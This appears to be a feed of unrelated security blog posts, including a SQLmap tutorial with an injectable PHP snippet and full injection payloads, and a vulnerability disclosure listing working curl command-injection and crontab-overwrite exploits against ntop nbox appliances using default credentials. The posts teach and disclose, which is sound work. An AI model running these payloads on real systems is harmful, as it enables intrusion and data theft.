I know I haven't patched yet, and there's a zero-day knocking at my door

Patching is important, but let's agree it takes time. It takes time to test & validate the patch in your environment, check the application compatibility with the software and the underlying services. And then, one fine day, an adversary just hacks your server due to this un-patched code while you are testing it. It breaks my heart and I wonder "what can be done in the delta period while the team is testing the patch"? Adversary on the other hand is busy either reversing the patch, or using a zero-day to attack the systems! I mean once a patch is released it's a race,

Either bad guys reverse it and release a working exploit, OR good guys test, verify and update their environment. A close game, always.

Technically, I wouldn't blame the application security team, or the one managing the vulnerable server. They have their SLA to apply updates on the OS or Application Servers. In my experience, a high severity patch has to be applied in 15 days, medium in 30 days, and low in 45 days. Now, if the criticality is too severe; it can should be managed in 24 to 48 hours with enough testing on functionality, compatibility, and test cases with application team; or server management team. Now, what to do when there is a zero-day exploit lurking in your backyard? It used to be a low-probability gamble, but now it's getting more realistic and frequent. The recent case of Apache Struts vulnerability has done enough damage for many big companies like Equifax. I already addressed this issue in a blog-post before, and the need for alternatives such as WAF in Secure SDLC.

What shall I do if there's a 0-day lurking in my backyard?

Yes, I know there's a zero day for your web-application or underlying server, and you are busy patching but what other security controls do you have in place?
Ask yourself these questions,

  1. Do I have understanding of the zero-day exploit? Is it affecting my application, or a particular feature?
  2. Do I have a product/ tool for prevention at the application layer for network perimeter that can filter bad requests - Network WAF (Web Application Firewall), Network IPS (Intrusion Prevention System) etc.?
  3. Do I have a product/ tool for prevention at the application layer for host - Host based IPS, WAF etc.
  4. Can I just take the application offline, while I patch?
  5. What's the threat model and risk appetite if the exploitation is successful?
  6. Can I brace for impact by lowering the interaction with other components, or by preventing it to spread across my environment?

Let's understand how these answers will support your planning to develop a resilient environment,

>> Understanding of the zero-day exploit

You know there's an exploit in the wild; but does your security team or devops guys take a look at it? Did they find the exploit and understood the impact on your application? It is very important to understand what are you dealing with before you plan to secure your environment. Not all exploits are in scope of your environment due to the limitations, frameworks, plugins etc. So, do research a bit, ask questions and accordingly work on your timelines. Best case, understand the pattern you have to protect your application from.

>> Prevention at the application layer for network perimeter

If you know what's coming to hit you, you can plan a strategy to block it as well. Blocking is more effective when it's at the perimeter - earlier the better. And, if you have done good research on the exploit, or the threat-vector that can affect you; please take a note of the pattern and find a way to block it at the perimeter while you patch the application.

>> Prevention at the application layer for host

There are sometimes even when you know the pattern, and the details on the exploit but still network perimeter is incapable of blocking it. Example, if the SSL offload is on the server/ load balancer. In this case make sure the server knows what is expected; blocks everything else including an anomaly. This can be achieved by Host based protection: IPS, or WAF.
Even a small thing like tripwire can monitor the directory, and files to make sure attacker is either not able to create files; or you get the alert at the right time to react. This can make a huge difference!

Note: Make sure the IPS (network/ host) is capable of in-depth packet filtering. If the pattern can be blocked on the WAF with a quick rule, do it and make sure it doesn't generate false positives which can impact your business. Also, do monitor the WAF for alerts which can tell you if there have been failed attempts by the adversaries. Remember, the attackers won't directly use their best weapon; usually it starts with "information gathering", or uploading files, or executing known exploits before customizing the case for their needs.

You have very high chances to detect adversaries while they are gathering insights about you. Keep a keen eye on any alert from production environment.

>> Taking application offline

Is it possible to take the offline while you patch the software? This depends on the fact what's the exposure of the application, what is the kind of CIA (Confidentiality, Integrity and Availability) rating and what kind of business impact assessment has been performed. If you think that taking it offline can speed up the process, and also reduce the exposure without hurting your business; do it. Better safe than sorry.

>> Threat model and risk appetite

You have to assess & perform threat modeling of the application. The reason it is required is not every risk is high. Not every application needs the same attention, and the vulnerable application may well be internal that will substantially reduce the exposure and underlying impact! Do ask your team - is the application Internet facing, how many users are using it, what kind of data is it dealing with etc. and act accordingly.

>> Brace for impact

Finally, if things still look blurred, start prepping yourself for impact. Try to minimize it by validating and restricting the access to the server. You can perform some sanity checks, and implement controls like,

  1. Least privilege accounts for application use
  2. Least interaction with the rest of production environment
  3. Restricted database requests and response to limit the data ex-filtration
  4. Keep the incident management team on high-alert.
Incident management - Are you sure you are not already breached?

Now, what are the odds that while you reading this blog, trying to answer all the questions and getting ready - you haven't already been compromised? Earlier such statement of incidents used to begin with "What if..." but now it says "When..." so, yeah make sure all your monitoring systems are reporting the anomalies and someone is monitoring it well. These tools are only good if some human being is responsibly validating the alerts. Once an alert is flagged red; a process should trigger to analyze and minimize the impact.
Read more about incident monitoring failures in my earlier blogpost. Don't be one of them.

Now, once you address these questions you must have a fairly resilient environment to either mitigate or absorb the impact. Be safe!

Exploit for CVE-2017-8759 detected and neutralized

The September 12, 2017 security updates from Microsoft include the patch for a previously unknown vulnerability exploited through Microsoft Word as an entry vector. Customers using Microsoft advanced threat solutions were already protected against this threat.

The vulnerability, classified as CVE-2017-8759, was used in limited targeted attacks and reported to us by our partner, FireEye. Microsoft would like to thank FireEye for responsibly reporting this vulnerability and for working with us to protect customers.

Customers receiving automatic updates for Microsoft products are protected from this attack without any additional action required. Customers not enjoying the benefits of automatic updates should consider immediately applying this month’s updates to avoid unnecessary exposure.

Office 365 ATP and Windows Defender ATP customers protected

Customers running Microsoft advanced threat solutions such as Office 365 Advanced Threat Protection or Windows Defender Advanced Threat Protection were safe from this attack without the need of additional updates. The security configuration and reduced attack surface of Windows 10 S blocks this attack by default.

Office 365 ATP blocked the malicious attachments automatically in customer environments that have adopted the mail detonation and filtering solution. The attachment was blocked based on the detection of the malicious behaviors, as well as its similarity with previous exploits. SecOps personnel would see an ATP behavioral detection in Office 365’s Threat Explorer page:

Figure 1. Block reasons for the exploit attachment as seen in Office 365 ATP console

Windows Defender ATP was also able to raise multiple alerts related to post-exploitation activities performed by this exploit using scripting engines and PowerShell. Additional alerts may also be visible for subsequent stages of the attack performed after malware installation.

In addition, Windows Defender Antivirus detects and blocks exploits for this vulnerability as Exploit:RTF/Fitipol.A, Behavior:Win32/Fitipol.A, and Exploit:RTF/CVE-2017-8759.A using the cloud protection service, which delivers near-real-time protection against such never-before-seen threats.

Figure 2. Windows Defender ATP alerts raised for CVE-2017-8759 zero-day exploit

Protection with Windows Defender Exploit Guard

We are also happy to share with customers testing our upcoming Windows 10 Fall Creators Update that Windows Defender Exploit Guard was also able to prevent this attack using one of the many Attack Surface Reduction rules and exploit protection features.

Figure 3. Example of exploit blocking event logged by Windows Defender Exploit Guard

Windows Defender Exploit Guard is part of the defense-in-depth protection in the Windows 10 Fall Creators Update release.

Another zero-day leading to FinFisher

The CVE-2017-8759 vulnerability can allow remote code execution after users open a spam email, and double-click on an untrusted attachment and disable the Microsoft Office Protected View mode. The exploit uses Microsoft Word as the initial vector to reach the real vulnerable component, which is not related to Microsoft Office and which is responsible for certain SOAP-rendering functionalities through .NET classes.

For more information on this new campaign our partner FireEye has a good technical blog describing the infection mechanism and the details of the exploit.

After the initial notification from FireEye, Windows Defender telemetry revealed very limited usage of this zero-day exploit. The attacker used this exploit to deploy a spyware detected as Wingbird and also known to the security community as “FinFisher”, a commercial surveillance package often seen combined with expensive zero-day vulnerabilities and used by sophisticated actors.

Microsoft researchers believe that the adversary involved in this operation could be linked to the NEODYMIUM group, which has used similar zero-day exploits with spear-phishing attachments combined with the usage of FinFisher spyware. We previously reported about the NEODYMIUM group in the Windows Security blog in 2016. For additional information about this new attack as well as other NEODYMIUM attacks, we encourage ATP customers to review the in-product Threat Intelligence reports on this activity group.

 

 

Elia Florio

Windows Defender ATP Research Team

 

 

Related blog posts

Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks

Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community.

Follow us on Twitter @MMPC and Facebook Microsoft Malware Protection Center

You are safe! ROPEMAKER is nothing but a ruse

You are safe! ROPEMAKER is nothing but a ruse

In last couple of days my security feed exploded with mention of ROPEMAKER (Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky) and my first reaction was "wow! someone broke the email, and that too post delivery. #WTF". I immediately opened the source i.e. the blogpost that Mimecast has posted explaining the issue. Frankly on first read, it was a disappointment! I think most of the people that are talking about it like a new, big fancy issue to panic about, do not understand the complete picture.

Disclaimer: This post is not to offense Mimecast, or in any way undermine the good work these guys do! It just addresses the fact that a security awareness article shouldn't be addressed as "Eureka!" moment with fancy acronyms.

Okay so let's see what the blogpost talks about? It quotes,

Using the ROPEMAKER exploit a malicious actor can change the displayed content in an email at will.

This is not completely (or always) true for the simple reason that it doesn't mention about who's sending this email? Is this the malicious actor who is the sender? If yes, then he would definitely have ways to alter the contents of the email (even after delivery) if the message contains the embedded URL to refer/ download/ include remote content (images, javascript, css etc.) which by assumption, is under his control! But, if the email has been sent by a "legit" source, but a malicious actor can "somehow" change the email content; then it's a vulnerability worthy of this spotlight.

The current web/ internet ecosystem is always considered untrusted; atleast when we talk about security in the network. Hence, the orthodox and old-school way of security is do not trust anything that comes from outside your trusted network, and emails are no exceptions! All of us who are security aware, have very well gone through the anti-phishing training. How is this attack any different than the fundamental awareness, do not trust unknown emails?

Lets see another quote from the blog,

Is ROPEMAKER a software vulnerability, a form of potential application abuse/exploit, or a fundamental design flaw resulting from the intersection of Web technologies and email? Does it really matter which it is?

You are safe! ROPEMAKER is nothing but a ruseYes, it does matter! If you make a buzz of your acronym ROPEMAKER, then it better be something new and not just a sanity check, or a check of best practices or security awareness. This whole is just a ruse, and any security aware company would have already gone through such anti-phishing trainings. Also, the perimeter devices or mail security products can't always check the email contents and we know it well. These security tools can't check all of the email contents, the URLs or God foresaken attachments (even encrypted).
How did the vendors respond to it? As expected, they (Apple and Microsoft) did not consider this as a vulnerability and more of a security awareness and best practice. It depends on your level of paranoia that you want to enable remote loading of images, content or just old-school plain-text emails. Now mimecast whitepaper (search via the dork: site:mimecast.com inurl:whitepaper ropermaker) talks about different ways to attack or exploit using ROPEMAKER. While some talk about MITM with the remote URLs but then that can happen over webpage, or even legit emails. That's not the vulnerability. It's not like you execute something like BEEF, and get control of the email(s) or URLs accessed (or embedded) in an legitimate email.

So to me it's a ruse; yes it is important to be aware of what you are clicking on, and which emails are you opening; but I don't think it's a vulnerability or something for which you may need any defense or software/ product,

... Mimecast has been able to add a defense against this exploit for our customers ...

At best, I repeat - please be aware of what you click, have good awareness training and security education and be prepared for the incident. It's not about if you will be hacked, but when you will be hacked!

Finally, to conclude this part with a satire (no offense mimecast), here are some other acronyms worth mentioning,

  1. ROPCAT: Remotely Originated Post-delivery Content Alteration Trick
  2. ROCKMAN: Remote Originated Content Knowhow Manipulated All my Network
  3. WTFACRONYM: Web Traffic Filter Alters Content of Regulatory Office Notes You Manage!

Be aware, and stay safe!

Sql Injection using SQLmap with multipart/form-data Encoding

I’ve spent a fair amount of my time examining code for vulnerabilities, I recently began to focus specifically on SQL injection. While investigating this specific type of vulnerability in web applications, I ran across a few examples where the injection point was in a POST request but it wasn’t your straightforward content-type application/x-www-form-urlencoded form.  The injection point was being passed as an array via POST and  processed inside of a foreach loop:

$person_name= $_POST['person']; 
foreach($person_name as $person => $value) { 
 $query = "select * from v_entry where vdbid = $value"; 
 $result = mysql_query($query); 
 $num = mysql_numrows($result); 
 $x=0; 
while ($num > $x) {   
 echo "<br>";    
 echo mysql_result($result,$x,1);    
 $x++;
 } 
}


The HTML form specified the encoding type as  ‘multipart/form-data’

A packet capture with tcpdump for the original form post and then my first attempt with SQLmap will easily display the differences below:

 # tcpdump -Xvvv port 80

POST: /post_sqli_research/form.php HTTP/1.1 
 Host: example.com
 Connection: keep-alive
 Content-Length: 591
 Cache-Control: max-age=0
 Origin: http://example.com
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla...
 Referer: http://example.com/post_sqli_research/form.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.8

 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person_create"
 
 Add Person

And the tcpdump output with a generic attempt using SQLmap:

 
 POST /post_sqli_research/form.php HTTP/1.1
 Content-Length: 135
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip,deflate
 Host: example.com
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 User-Agent: sqlmap/1.0.8.2#dev (http://sqlmap.org)
 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 Connection: close
 Pragma: no-cache
 Cache-Control: no-cache,no-store
 Content-Type: application/x-www-form-urlencoded; charset=utf-8
 
 Person%5BPerson_name%5D=%20UNION%20ALL%20SELECT%20NULL%23&Person%5BPerson_contact%5D=1&Person%5BPerson_email%5D=1&Person%5Bdescription%5D=1%22[!http]

We see the Content-Type encoding isn’t what the form is expecting. I’ll clean up and modify the TCP-dump output to add a ‘*’ where we think the injection point is.  I’ll then save it in a file called request.txt and then supply that as an argument to -r REQUESTFILE in SQL map.  It should look similar to the output below:

$ cat request.txt
 
 POST /post_sqli_research/test.php HTTP/1.1
 Host: example.com
 Connection: keep-alive
 Content-Length: 591
 Cache-Control: max-age=0
 Origin: http://example.com
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla...
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
 Referer: http://example.com/post_sqli_research/form.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.8
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1*
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person_create"
 
 Add Person
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2--

I’ll specify the parameter on the SQLmap command line where we placed a ‘*’ in the input to mark our suspected injection point with -p TESTPARAMETER.  I mentioned above that -r tells SQLmap to use the format specified in that file to generate the request.

 $ sqlmap  -r request.txt -p "Person[Person_name]" --level 2 --risk 2
 .
 .
 .
 
 [11:40:13] [INFO] (custom) POST parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
 (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
 sqlmap identified the following injection point(s) with a total of 373 HTTP(s) requests:
 
 ---
 
 Parameter: #1* ((custom) POST)
 
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
 Payload: ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1 AND (SELECT * FROM (SELECT(SLEEP(5)))GrGB)
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person_create"
 Add Person
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2--
     Type: UNION query
 
     Title: Generic UNION query (NULL) - 19 columns
 
     Payload: ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1 UNION ALL SELECT NULL,CONCAT(0x7170787671,0x534c744f4a7043446e4c6c55596b634b61624c6d55686e546272756b736a4e6973544979686c746c,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- kVed
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 
 Content-Disposition: form-data; name="Person_create"
 
 Add Person
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2-----
 [11:40:15] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Debian 8.0 (jessie)
 web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12
 
 [11:40:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
 [*] shutting down at 11:40:15

Above we see in the SQLmap output that it confirms our injection point is exploitable.

Conclusion

As a vulnerability researcher, I run across all sorts of interesting code and ways to exploit it.  It’s always a learning experience, this is one of the reasons why I try to spend some time each week hunting for bugs.  I enjoy the discovery and exploitation while learning new things along the way.

The post Sql Injection using SQLmap with multipart/form-data Encoding appeared first on Liquidmatrix Security Digest.

Overload: Critical Lessons from 15 Years of ICS Vulnerabilities

In the past several years, a flood of vulnerabilities has hit industrial control systems (ICS) – the technological backbone of electric grids, water supplies, and production lines. These vulnerabilities affect the reliable operation of sensors, programmable controllers, software and networking equipment used to automate and monitor the physical processes that keep our modern world running.

FireEye iSIGHT Intelligence has identified nearly 1,600 publicly disclosed ICS vulnerabilities since 2000. We go more in depth on these issues in our latest report, Overload: Critical Lessons from 15 Years of ICS Vulnerabilities, which highlights trends in total ICS vulnerability disclosures, patch availability, vulnerable device type and vulnerabilities exploited in the wild.

FireEye’s acquisition of iSIGHT provided tremendous visibility into the depth and breadth of vulnerabilities in the ICS landscape and how threat actors try to exploit them. To make matters worse, many of these vulnerabilities are left unpatched and some are simply unpatchable due to outdated technology, thus increasing the attack surface for potential adversaries. In fact, nation-state cyber threat actors have exploited five of these vulnerabilities in attacks since 2009.

Unfortunately, security personnel from manufacturing, energy, water and other industries are often unaware of their own control system assets, not to mention the vulnerabilities that affect them. As a result, organizations operating these systems are missing the warnings and leaving their industrial environments exposed to potential threats.

Click here to download the report and learn more.

Got any RCEs?

Security is a boomin’, and so there are many different appliances to protect your network. Some of them do very little to protect, some of them open new holes in your network.

In line with best practice, many Security teams capture all network traffic using a variety of solutions, some closed, some open source. Once the traffic is stored, it can be used to detect badness, or just examine traffic patterns on corporate assets.

One of these open source options is NTOP, which of course has an appliance version, called nbox recorder.  It goes without saying, if this traffic data were to be exposed, the consequences could be catastrophic. Consider stored credentials, authentication data, PII, internal data leakage...
pcap_tee.png
PCAP or it didn't happen

You can either buy a ready-to-go appliance or with some drudge work you can build your own. Just get a license for nbox and just put it into a Linux box, they are nice like that providing all the repositories and the steps are simple and easy to follow. Just spin up an Ubuntu VM and run:


wget http://apt.ntop.org/14.04/all/apt-ntop.deb
sudo dpkg -i apt-ntop.deb
sudo apt-get clean all
sudo apt-get update
sudo apt-get install -y pfring nprobe ntopng ntopng-data n2disk cento nbox





BOOM! You are ready to go. Now you have a nbox recorder ready to be used. And abused!
The default credentials are nbox/nbox and it does use Basic Auth to be accessed.

Before I continue, imagine that you have this machine capturing all the traffic of your network. Listening to all your corporate communications or production traffic and storing them on disk. How bad would it be if an attacker gets full access to it? Take a minute to think about it.


nervs.gif
Uh-oh...
This level of exposure caught my eye, and I wanted to verify that having one of these sitting in your network does not make you more exposed. Unfortunately, I found several issues that could have been catastrophic with a malicious intent.

I do believe in the responsible disclosure process, however after repeatedly notifying both ntop and MITRE, these issues were not given high priority nor visibility. The following table details the timeline around my disclosure communications: 

Disclosure Timeline

12/27/2014 - Sent to ntop details about some nbox vulnerabilities discovered in version 2.0
01/15/2015 - Asked ntop for an update about the vulnerabilities sent
01/16/2015 - Requested by ntop the details again, stating they may have been fixed
01/18/2015 - Sent for a second time the vulnerabilities details. Mentioned to request CVEs
05/24/2015 - Asked ntop for an update about the vulnerabilities sent and to request CVEs
01/06/2016 - Noticed new nbox version is out (2.3) and found more vulnerabilities. Old vulnerabilities are fixed. Sent ntop an email about new issues and to request CVEs
01/06/2016 - Quick answer ignoring my request for CVEs and just asking for vulnerabilities details.
01/28/2016 - Sent request for CVEs to MITRE, submitting a full report with all the issues and steps to reproduce.
02/17/2016 - Asked MITRE for an update on the issues submitted.
02/17/2016 - Reply from MITRE: “Your request is outside the scope of CVE's published priorities. As such, it will not be assigned a CVE-ID by MITRE or another CVE CNA at this time.”

07/10/2016 - Noticed new nbox version (2.5) with partial fixes for some vulnerabilities in the previous (2.3) version

The ntop team initially refused to comment and silently fixed the bugs. MITRE then said this wasn't severe enough to warrant a CVE. As such, I have now chosen to highlight the issues here in an effort to have them remediated. I again want to highlight that I take this process very seriously, but after consulting with multiple other individuals, I feel that both the ntop team and MITRE have left me no other responsible options.
neotrain1.jpg
Here comes the paintrain!

*Replace NTOP-BOX with the IP address of your appliance (presuming that you already logged in). Note that most of the RCEs are wrapped in sudo so it makes the pwnage much more interesting:


RCE: POST against https://NTOP-BOX/ntop-bin/write_conf_users.cgi with parameter cmd=touch /tmp/HACK

curl -sk --user nbox:nbox --data 'cmd=touch /tmp/HACK' 'https://NTOP-BOX/ntop-bin/write_conf_users.cgi'


RCE: POST against https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi with parameters interface=;touch /tmp/HACK;


curl -sk --user nbox:nbox --data 'interface=;touch /tmp/HACK;' 'https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi'


RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap


curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap'


RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22


curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22'

RCE: POST against https://NTOP-BOX/ntop-bin/do_mergecap.cgi with parameters opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit%200

curl -sk --user nbox:nbox --data 'opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit 0' 'https://NTOP-BOX/ntop-bin/do_mergecap.cgi'

There are some other interesting things, for example, it was possible to have a persistent XSS by rewriting crontab with a XSS payload on it, but they fixed it in 2.5. However the crontab overwrite (Wrapped in sudo) is still possible:

GET https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON'

The last one is a CSRF that leaves the machine fried, by resetting the machine completely:
GET https://NTOP-BOX/ntop-bin/do_factory_reset.cgi

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_factory_reset.cgi'


To make things easier, I created a Vagrantfile with provisioning so you can have your own nbox appliance and test my findings or give it a shot. There is more stuff to be found, trust me :)


And you can run the checker.sh to check for all the above attacks. Pull requests are welcome if you find more!



Screen Shot 2016-07-26 at 10.00.27.png





nodding.gif





(The issues were found originally in nbox 2.3 and confirmed in nbox 2.5)

Modules for metasploit and BeEF will come soon. I hope this time the issues are not just silently patched...

If you have any questions or feedback, hit me up in twitter (@javutin)!

Have a nice day!


Statement: Smoothwall and the "FREAK" Vulnerability

In light of the recent "FREAK" vulnerability, in which web servers and web browsers can be cajoled into using older, more vulnerable ciphers in encrypted communications, we would like to assure customers that the web server configuration on an up-to-date Smoothwall system is not vulnerable to this attack.

Similarly, if you are using "HTTPS Decrypt & Inspect" in Smoothwall, your clients' browsers will afforded some protection from attack, as their traffic will be re-encrypted by the web filter, which does not support downgrading to these "Export Grade" ciphers.

Which operating system is the most secure? Four points to remember.

No, you are almost certainly wrong if you tried to guess. A recent study shows that products from Apple actually are at the top when counting vulnerabilities, and that means at the bottom security-wise. Just counting vulnerabilities is not a very scientific way to measure security, and there is a debate over how to interpret the figures. But this is anyway a welcome eye-opener that helps kill old myths.

Apple did for a long time stubbornly deny security problems and their marketing succeeded in building an image of security. Meanwhile Windows was the biggest and most malware-targeted system. Microsoft rolled up the sleeves and fought at the frontline against viruses and vulnerabilities. Their reputation suffered but Microsoft gradually improved in security and built an efficient process for patching security holes. Microsoft had what is most important in security, the right attitude. Apple didn’t and the recent vulnerability study shows the result.

Here’s four points for people who want to select a secure operating system.

  • Forget reputation when thinking security. Windows used to be bad and nobody really cared to attack Apple’s computers before they became popular. The old belief that Windows is unsafe and Apple is safe is just a myth nowadays.
  • There is malware on almost all commonly used platforms. Windows Phone is the only exception with practically zero risk. Windows and Android are the most common systems and malware authors are targeting them most. So the need for an anti-malware product is naturally bigger on these systems. But the so called antivirus products of today are actually broad security suites. They protect against spam and harmful web sites too, just to mention some examples. So changes are that you want a security product anyway even if your system isn’t one of the main malware targets.
  • So which system is most secure? It’s the one that is patched regularly. All the major systems, Windows, OS X and Linux have sufficient security for a normal private user. But they will also all become unsafe if the security updates are neglected. So security is not really a selection criteria for ordinary people.
  • Mobile devices, phones and tablets, generally have a more modern systems architecture and a safer software distribution process. Do you have to use a desktop or laptop, or can you switch to a tablet? Dumping the big old-school devices is a way to improve security. Could it work for you?

So all this really boils down to the fact that you can select any operating system you like and still be reasonable safe. There are some differences though, but it is more about old-school versus new-school devices. Not about Apple versus Microsoft versus Linux. Also remember that your own behavior affects security more than your choice of device, and that you never are 100% safe no matter what you do.

 

Safe surfing,
Micke

 

Added February 27th. Yes, this controversy study has indeed stirred a heated debate, which isn’t surprising at all. Here’s an article defending Apple. It has flaws and represent a very limited view on security, but one of its important points still stands. If someone still thinks Apple is immortal and invincible, it’s time to wake up. And naturally that this whole debate is totally meaningless for ordinary users. Just keep patching what you have and you will be fine. 🙂 Thanks to Jussi (and others) for feedback.